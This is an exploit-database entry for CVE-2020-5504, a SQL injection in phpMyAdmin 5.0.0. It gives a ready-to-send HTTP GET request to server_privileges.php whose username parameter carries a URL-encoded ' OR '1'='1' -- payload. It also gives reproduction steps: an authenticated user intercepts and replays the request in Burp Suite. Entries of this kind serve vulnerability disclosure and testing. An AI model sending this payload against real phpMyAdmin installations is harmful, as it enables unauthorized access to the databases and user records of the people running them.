phpMyAdmin 5.0.0 - SQL Injection

Author: CodeSecLab
type: webapps
platform: php
port: 
date_added: 2025-12-03 
date_updated: 2025-12-03 
verified: 0 
codes: CVE-2020-5504 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/
# Software Link: https://github.com/phpmyadmin/phpmyadmin/
# Version: 5.0.0
# Tested on: Windows
# CVE : CVE-2020-5504


Proof Of Concept
GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

# Additional conditions:
# - The attacker must have a valid MySQL account to access the server.


Steps to Reproduce
Log in phpmyadmin.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
Observe the result.